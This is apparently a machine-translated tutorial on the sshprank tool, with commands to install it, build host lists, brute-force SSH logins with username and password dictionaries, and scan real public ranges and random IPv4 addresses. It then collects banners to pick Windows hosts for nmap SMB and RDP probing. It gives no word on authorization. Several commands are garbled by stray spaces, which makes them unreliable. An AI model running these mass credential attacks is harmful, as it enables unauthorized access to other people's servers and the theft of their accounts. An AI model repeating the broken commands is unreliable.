sshprank: Bulk SSH Credential Verification & Fast SSH Banner Collection

[Lord777]

This article focuses on the sshprank tool, which is a fast scanner for a large number of SSH servers. The program searches for computers running SSH and tries to log in using the specified credentials, that is, it performs brute-force. The program is also able to very quickly collect banners of a large number of SSH.

If you don't know what SSH is, check out the online book The Complete Guide to SSH on Linux and Windows. SSH is an essential service for connecting and executing commands on remote Linux computers. But SSH is also heavily used on FreeBSD computers and even sometimes on Windows.

How to install sshprank
Installing sshprank on Kali Linux

sudo apt install python3-pip
git clone https://github.com/noptrix/sshprank
cd sshprank
sudo pip3 install -r docs / requirements.txt
./sshprank.py -H

Installing sshprank in BlackArch

sudo pacma n -S sshprank

Installing sshprank on Windows

Start by installing Python at How to Install Python and PIP on Windows 10.

After installing Python and PIP, download the sshprank source archive from the link: https://github.com/noptrix/sshprank/archive/master.zip

Unpack the archive.

Open a Command Prompt or PowerShell (if you don't know how, see the article "Setting up a PowerShell Desktop Environment on Windows and Linux").

Go to the folder of the unpacked archive using the cd command (you will have a different path to the folder, so edit the command accordingly):

cd C: \ Users \ MiAl \ Downloads \ sshprank-master \

Install the required dependencies:

pip install -r docs \ requirements.txt

Check (there should be a help on the use of the program):

python. \ sshprank.py -H

Further work with the program is the same as in Linux, but instead of sshprank you need to specify python. \ Sshprank.py , for example:

python. \ sshprank.py -h 138.201.59.125 -v

How to create a host list
The sshprank program does not directly support ranges, although I will show you how you can still specify which subnets to scan with sshprank in a moment. So sshprank needs to create a host list.

If you are confused about the following examples, see the section on Expanding curly braces.

So, I want to scan the range 138.201.0.0/16. To list the hosts, I run the following command:

echo -e 138.201. {0..255}. {0..255} "\ n" | sed 's / //'> hosts.txt

Let's check what we got:

head -n 20 hosts.txt

How to run sshprank
In sshprank, hosts can be specified with the following options:

-h <HOST: [PORTS]> - one port for cracking. You can specify multiple ports, in this
case separate them with commas, i.e .: 22,2022,22222 (default port: 22)

-l <FILE> - list of hosts for cracking. Format: <host> [: ports]. You can specify multiple ports, in this case separate them with commas (default port: 22)

That is, if we want to specify a single host, then this can be done using the -h option:

./sshprank.py -h 138.201.59.125

You can also specify ports (otherwise the default port for SSH service 22 is used):

./sshprank.py -h 138.201.59.125:22,2022,22222

By default, the program does not display any information, it does not even show the compromised hosts, logins and passwords. To display this information, use the -v option:

./sshprank.py -h 138.201.59.125 -v

If the username and password are not specified, then “root” is used as the login, and “root” is used as the password.

How to specify logins and passwords files in sshprank
To specify a username, password or dictionaries with them, the following options are used:

-u <USER> - single username (default: root)
-U <FILE> - list of usernames
-p - one password (default: root)
-P <FILE> - list of passwords
-C <FILE> - list of combinations USER: PASSWORD

Tiny dictionaries are supplied with the program:

• lists / user.txt - usernames
• lists / pws.txt - passwords
• lists / combo.txt - combinations of usernames and passwords

But dictionaries are very tiny, I would recommend using other, more suitable ones. You can find examples in the section "Lists of words (dictionaries)".

Let's run sshprank against one host to brute-force a username and password, the specified dictionaries will be used for brute-force:

sshprank -h 192.168.0.100 -U user.txt -P passwords.txt -v

Sshprank results
If we hadn't used the -v option, then almost nothing would have been output. The -v option displays information about connection attempts, successfully matched accounts, as well as reasons for failure, for example:

• [!] could not connect: - could not connect (because the SSH service is not started, or the host is generally offline).
• [!] login failure:… (auth timeout) - authentication timeout - most likely reason is wrong username or password.
• [!] login failure:… (auth failed) - the server clearly reported a failed login (wrong username or password).
• [!] login failure:… (pubkey auth) - authentication failed due to public key login.

Notice the line with the green asterisk:

[*] found login: 192.168.0.100:22:mial:2

That is, the login (mial) and password (2) were found for the service on port 22 on the host 192.168.0.100.

All successfully found logins and passwords are saved to the owned.txt file in the current working folder. The name and path to the file can be changed with the -o <FILE> option.

How to scan large amounts of SSH
We can specify a list of hosts with the following option:
-l <FILE> - list of hosts for cracking. Format: <host> [: ports]. You can specify multiple ports, in this case separate them with commas (default port: 22)

Launch example:

./sshprank.py -l hosts.txt -U lists / user.txt -P lists / pws.txt -v

It is impossible to understand the output of sshprank if multiple hosts are scanned. To avoid manually checking the owned.txt file all the time, you can use the following commands:

touch owned.txt
tail -f owned.txt

The first command will create the file if it doesn't already exist. And the second command will immediately display all changes in this file, if any.

How to quickly collect SSH banners on a large network
The -b option is used for this:
-b <FILE> - list of hosts for collecting sshd banners in
format: <host> [: ports]. Multiple ports can be
separated by commas (default port: 22)
That is, with this option, you can specify a list of hosts in the same format as the -l option. Only the operating mode will change - banners will be collected instead of brute-force.

Below is an example of launching, the results obtained will be saved to the specified file:

./sshprank.py -b hosts.txt> ssh_banners.txt

You can monitor the contents of this file in the same way:

touch ssh_banners.txttail 
-f ssh_banners.txt

Banners can be used for a variety of purposes. For example, you can find all Windows computers running the SSH service:

cat ssh_banners.txt | grep -i windows

On Windows servers, the SMB and RDP service ports are quite often open , you can play with them.

To filter Windows hosts:

cat ssh_banners.txt | grep -i windows | awk -F ':' '{print $ 1}'> windows_hosts.txt

Scanning to SMB and NetBIOS:

sudo nmap -iL windows_hosts.txt -p 139,445 --open

Scanning for open RDP ports:

sudo nmap -iL windows_hosts.txt -p 3389 -sU -sS --open

An example of getting RDP information and Windows computer name:

sudo nmap -p 3389 -sU -sS --script 'rdp- *' 138.201.134.34

To find computers running FreeBSD:

cat ssh_banners.txt | grep -i bsd

Using banners, you can search for old versions of Linux distributions, specific versions of the SSH implementation that are known to be vulnerable, perform statistical analysis, and so on.

Masscan options
sshprank uses module Masscan, and also has the option -m where you can pass options are already in itself Masscan. A few examples:

A quick scan, then cracking the found ssh services. Data for scanning is passed to masscan (-m '-p22,2022 --rate = 5000 --source-ip 192.168.13.37 --range 192.168.13.1/24'):

sudo ./sshprank -m '-p22,2022 --rate = 5000 --source-ip 192.168.13.37 --range 192.168.13.1/24'

That is, ranges of IP addresses for scanning are specified in masscan with the --range option.

Generate a thousand random IPv4 addresses, then scan the ports at a speed of 1k p / s and try to crack the found sshd servers with the credentials 'root: root':

sudo ./sshprank -m '-p22 --rate = 1000' -r 1000 -v

You can specify not only these, but any Masscan options. Description of all Masscan options: https://kali.tools/?p=976

All sshprank options
All sshprank options can be found on the page: https://kali.tools/?p=5554

Conclusion
sshprank comes in handy when your target is SSH servers scattered across a large network or when you need to collect SSH banners on large ranges very quickly. For example, from the / 16 range (65536 IP addresses), you can collect banners for SSH services in just a few minutes.